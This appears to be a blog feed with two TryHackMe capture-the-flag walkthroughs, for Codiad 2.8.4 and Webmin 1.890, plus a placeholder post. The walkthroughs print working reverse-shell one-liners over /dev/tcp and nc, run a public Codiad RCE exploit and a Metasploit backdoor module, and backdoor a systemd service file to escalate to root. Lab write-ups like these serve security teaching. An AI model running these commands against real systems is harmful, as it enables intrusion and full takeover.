First, make sure the host is up - ping 10.x.x.x
nmap -sV -sC -T4 -p- 10.x.x.x my go to scan for CTFs
Nmap:
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-09 23:48 -0400
Nmap scan report for 10.x.x.x
Host is up (0.032s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:192.x.x.x
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 3
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 e2:be:d3:3c:e8:76:81:ef:47:7e:d0:43:d4:28:14:28 (RSA)
| 256 a8:82:e9:61:e4:bb:61:af:9f:3a:19:3b:64:bc:de:87 (ECDSA)
|_ 256 24:46:75:a7:63:39:b6:3c:e9:f1:fc:a4:13:51:63:20 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
62337/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Codiad 2.8.4
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.08 seconds
Findings:
┌──(kali㉿kali)-[~/Documents/thm]
└─$ ftp 10.x.x.x
Connected to 10.x.x.x.
220 (vsFTPd 3.0.3)
Name (10.x.x.x:kali): Anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||42192|)
150 Here comes the directory listing.
226 Directory send OK.
ftp> pwd
Remote directory: /
ftp> ls -la
229 Entering Extended Passive Mode (|||55005|)
150 Here comes the directory listing.
drwxr-xr-x 3 0 114 4096 Jun 18 2021 .
drwxr-xr-x 3 0 114 4096 Jun 18 2021 ..
drwxr-xr-x 2 0 0 4096 Jun 18 2021 ...
226 Directory send OK.
ftp> cd ...
250 Directory successfully changed.
ftp> ls
229 Entering Extended Passive Mode (|||61662|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 151 Jun 18 2021 -
226 Directory send OK.
ftp> get -
local: - remote: -
229 Entering Extended Passive Mode (|||32017|)
150 Opening BINARY mode data connection for - (151 bytes).
100% |*****************************************************************| 151 209.46 KiB/s 00:00 ETA
226 Transfer complete.
151 bytes received in 00:00 (3.98 KiB/s)
ftp>
Interesting way to hide a file, but I eventually found it.
Now lets check it out:
┌──(kali㉿kali)-[~/Documents/thm]
└─$ cp - dash
┌──(kali㉿kali)-[~/Documents/thm]
└─$ ls
- dash
┌──(kali㉿kali)-[~/Documents/thm]
└─$ cat dash
Hey john,
I have reset the password as you have asked. Please use the default password to login.
Also, please take care of the image file ;)
- drac.
We got a username and hint for a password, lets check the website now.
I just visited 10.x.x.x:80 and :62337, Port 80 was the default Apache page, port 62337 is a log in portal!
I was going to try and bruteforce it with hydra, however the note said it was a default password, likey a hint that its easy, I tried password and it was correct yay!
Now that we have credentials, lets see if we can find an exploit
Just looking at searchsploit, we found this:
┌──(kali㉿kali)-[~/Documents/thm]
└─$ searchsploit codiad
---------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------- ---------------------------------
Codiad 2.4.3 - Multiple Vulnerabilities | php/webapps/35585.txt
Codiad 2.5.3 - Local File Inclusion | php/webapps/36371.txt
Codiad 2.8.4 - Remote Code Execution (Authenticated) | multiple/webapps/49705.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (2) | multiple/webapps/49902.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (3) | multiple/webapps/49907.py
Codiad 2.8.4 - Remote Code Execution (Authenticated) (4) | multiple/webapps/50474.txt
Perfect, the site is in Codiad 2.8.4 - Lets copy one of them over and exploit:
┌──(kali㉿kali)-[~/Documents/thm]
└─$ cp /usr/share/exploitdb/exploits/multiple/webapps/49705.py .
now, how does it work?
┌──(kali㉿kali)-[~/Documents/thm]
└─$ python3 49705.py
Usage :
python 49705.py [URL] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
python 49705.py [URL:PORT] [USERNAME] [PASSWORD] [IP] [PORT] [PLATFORM]
Example :
python 49705.py http://localhost/ admin admin 8.8.8.8 8888 linux
python 49705.py http://localhost:8080/ admin admin 8.8.8.8 8888 windows
Author :
WangYihang <wangyihanger@gmail.com>
ok, so we type in the creds, and hit enter:
┌──(kali㉿kali)-[~/Documents/thm]
└─$ python 49705.py http://10.x.x.x:62337/ john password 192.x.x.x 9001 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/192.x.x.x/9002 0>&1 2>&1"' | nc -lnvp 9001
nc -lnvp 9002
[+] Please confirm that you have done the two command above [y/n]
[Y/n] Y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"john"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"CloudCall","path":"\/var\/www\/html\/codiad_projects"}}
[+] Writeable Path : /var/www/html/codiad_projects
[+] Sending payload...
as well as
echo 'bash -c "bash -i >/dev/tcp/192.x.x.x/9002 0>&1 2>&1"' | nc -lnvp 9001
AND
┌──(kali㉿kali)-[~/Documents/thm]
└─$ nc -lnvp 9002
listening on [any] 9002 ...
connect to [192.x.x.x] from (UNKNOWN) [10.x.x.x] 38720
bash: cannot set terminal process group (952): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ide:/var/www/html/codiad/components/filemanager$ whoami
which gives us our shell. Interesting payload, make sure to run both of the commands it asks in different terminals.
We have a shell, look for flags and try to get root!
www-data@ide:/var/www/html/codiad/components/filemanager$ cd /
cd /
www-data@ide:/$ cd home
cd home
www-data@ide:/home$ ls
ls
drac
www-data@ide:/home$ cd drac
cd drac
www-data@ide:/home/drac$ ls
ls
user.txt
www-data@ide:/home/drac$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
www-data@ide:/home/drac$ ls -la
ls -la
total 52
drwxr-xr-x 6 drac drac 4096 Aug 4 2021 .
drwxr-xr-x 3 root root 4096 Jun 17 2021 ..
-rw------- 1 drac drac 49 Jun 18 2021 .Xauthority
-rw-r--r-- 1 drac drac 36 Jul 11 2021 .bash_history
-rw-r--r-- 1 drac drac 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 drac drac 3787 Jul 11 2021 .bashrc
drwx------ 4 drac drac 4096 Jun 18 2021 .cache
drwxr-x--- 3 drac drac 4096 Jun 18 2021 .config
drwx------ 4 drac drac 4096 Jun 18 2021 .gnupg
drwx------ 3 drac drac 4096 Jun 18 2021 .local
-rw-r--r-- 1 drac drac 807 Apr 4 2018 .profile
-rw-r--r-- 1 drac drac 0 Jun 17 2021 .sudo_as_admin_successful
-rw------- 1 drac drac 557 Jun 18 2021 .xsession-errors
-r-------- 1 drac drac 33 Jun 18 2021 user.txt
www-data@ide:/home/drac$ cat .bash_history
cat .bash_history
mysql -u drac -p 'Th3dRaCULa1sR3aL'
www-data@ide:/home/drac$
We were not authorized to view drac’s files, but the .bash_history file, (that stores a record of commands previously executed in the Bash shell) had drac’s password!
Lets try to read that flag now:
www-data@ide:/home/drac$ su drac
su drac
su: must be run from a terminal
www-data@ide:/home/drac$ python3 -c 'import pty;pty.spawn("/bin/bash")'
python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ide:/home/drac$ whoami
whoami
www-data
www-data@ide:/home/drac$ su drac
su drac
Password: Th3dRaCULa1sR3aL
drac@ide:~$ cat user.txt
cat user.txt
████████████████████████████████
drac@ide:~$
We had to upgrade our shell, but we got our first flag! If you are wondering about why we had to upgrade the shell, I wrote a little about it in my first post, I would reccomend doing some research on why we do this as its something I requently find myself doing in CTFs.
Escalation now!
drac@ide:/$ sudo -l
Matching Defaults entries for drac on ide:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User drac may run the following commands on ide:
(ALL : ALL) /usr/sbin/service vsftpd restart
First, lets make things easier, since we have credentials im just going to ssh in:
ssh drac@10.x.x.x
Doing some research, I found this article LINK which helped me quite a bit.
After reading, I just followed their steps:
drac@ide:/usr/sbin$ locate 'vsftpd.service'
/etc/systemd/system/multi-user.target.wants/vsftpd.service
/lib/systemd/system/vsftpd.service # this one!
/var/lib/lxcfs/cgroup/blkio/system.slice/vsftpd.service
/var/lib/lxcfs/cgroup/cpu,cpuacct/system.slice/vsftpd.service
# ... more paths
Next part of the article:
[Unit]
Description=vsftpd FTP server
After=network.target
[Service]
Type=simple
ExecStart=/usr/sbin/vsftpd /etc/vsftpd.conf
ExecReload=/bin/kill -HUP $MAINPID
ExecStartPre=/bin/bash -c 'bash -i >& /dev/tcp/<local-ip>/4444 0>&1'
[Install]
WantedBy=multi-user.target
We add that to our file but with our ip, and start a nc listening on that port, then restart the daemon!
drac@ide:/lib/systemd/system$ vim vsftpd.service
# make the edits
drac@ide:/lib/systemd/system$ systemctl daemon-reload
==== AUTHENTICATING FOR org.freedesktop.systemd1.reload-daemon ===
Authentication is required to reload the systemd state.
Authenticating as: drac
Password:
==== AUTHENTICATION COMPLETE ===
drac@ide:/lib/systemd/system$ sudo /usr/sbin/service vsftpd restart
and shell (make sure to do this after editing the file)
┌──(kali㉿kali)-[~/Documents/thm]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.x.x.x] from (UNKNOWN) [10.x.x.x] 59390
bash: cannot set terminal process group (2770): Inappropriate ioctl for device
bash: no job control in this shell
root@ide:/# whoami
whoami
root
root@ide:/# cd root
cd root
root@ide:/root# cat root.txt
cat root.txt
████████████████████████████████
root@ide:/root#
Room done!
Thank you for reading, and thanks to LINK for the really helpful priv esc!
]]>Nmap:
┌──(kali㉿kali)-[~/Documents/thm]
└─$ nmap -sV -sC -T4 -p- 10.x.x.x
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-06
...
Nmap scan report for 10.x.x.x
Host is up (0.015s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Findings:
For ease of use, i’m just going to use metasploit and utilize the search command to try and find something:
msf > search Webmin 1.890
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/linux/http/webmin_backdoor 2019-08-10 excellent Yes Webmin password_change.cgi Backdoor
1 \_ target: Automatic (Unix In-Memory) . . . .
2 \_ target: Automatic (Linux Dropper) . . . .
Interact with a module by name or index. For example info 2, use 2 or use exploit/linux/http/webmin_backdoor
After interacting with a module you can manually set a TARGET with set TARGET 'Automatic (Linux Dropper)'
Perfect, we found something to try in metasploit.
msf > use 0
[*] Using configured payload cmd/unix/reverse_perl
msf exploit(linux/http/webmin_backdoor) >
Now we set the correct options:
msf exploit(linux/http/webmin_backdoor) > show options
Module options (exploit/linux/http/webmin_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported
proxies: sapni, socks4, socks5, socks5h, http
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasplo
it/basics/using-metasploit.html
RPORT 10000 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
TARGETURI / yes Base path to Webmin
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host or network interface to listen on. This must be an address
on the local machine or 0.0.0.0 to listen on all addresses.
SRVPORT 8080 yes The local port to listen on.
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic (Unix In-Memory)
View the full module info with the info, or info -d command.
msf exploit(linux/http/webmin_backdoor) >
After setting the correct options, we run the module.
msf exploit(linux/http/webmin_backdoor) > set RHOSTS 10.x.x.x.x
RHOSTS => 10.x.x.x.x
msf exploit(linux/http/webmin_backdoor) > set LHOST 192.x.x.x.x
LHOST => 192.x.x.x.x
msf exploit(linux/http/webmin_backdoor) > exploit
[*] Started reverse TCP handler on 192.x.x.x.x:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Please enable the SSL option to proceed
[-] Exploit aborted due to failure: unknown: Cannot reliably check exploitability. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf exploit(linux/http/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
msf exploit(linux/http/webmin_backdoor) > run
[*] Started reverse TCP handler on 192.x.x.x.x:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable.
[*] Configuring Automatic (Unix In-Memory) target
[*] Sending cmd/unix/reverse_perl command payload
[*] Command shell session 1 opened (192.x.x.x.x:4444 -> 10.x.x.x.x:43670) at 2026-03-05 23:53:33 -0500
whoami
root
We had to set SSL to true because Webmin 1.890 runs over HTTPS by default, so metasploit needs SSL enabled to communicate with it or it can’t reach the backdoor url. (http://10.x.x.x:10000/password_change.cgi)
Surprisingly easy, metasploit is very powerful when it works!
As root, this is trivial, but first let’s secure our shell:
pwd
/usr/share/webmin
python -c 'import pty;pty.spawn("/bin/bash")'
root@source:/usr/share/webmin/# whoami
whoami
root
root@source:/usr/share/webmin/#
Before exploring the system, we upgrade our raw (unstable) shell to a fully interactive TTY (more stable). The default reverse shell from Metasploit is non-interactive, so commands like su will hang and there’s no tab completion or command history. Spawning a PTY with Python fixes this:
python -c 'import pty; pty.spawn("/bin/bash")'
On boxes where Python isn’t available, common fallbacks are script /dev/null -c bash or python3 instead of python. You can just google this too.
Now we find the flags!
root@source:/usr/share/webmin# cd /
cd /
root@source:/# find . -name user.txt
find . -name user.txt
./home/dark/user.txt
root@source:/# cat ./home/dark/user.txt
cat ./home/dark/user.txt
THM{XXXXXX_XXXXX_XXXXXXXXXX}
root@source:/# find . -name root.txt
find . -name root.txt
./root/root.txt
root@source:/# cat ./root/root.txt
cat ./root/root.txt
THM{XXXXXX_XXXX_XXXXXXX}
root@source:/# :)
And done! (you have to find the flags for yourself)
Thank you for reading!
]]>This would be the first step in finding something most of the time
print("Hello world!")
Explanation of the code: prints hello world in python!
Escalate!
explain more if needed!
Good way to make a post
]]>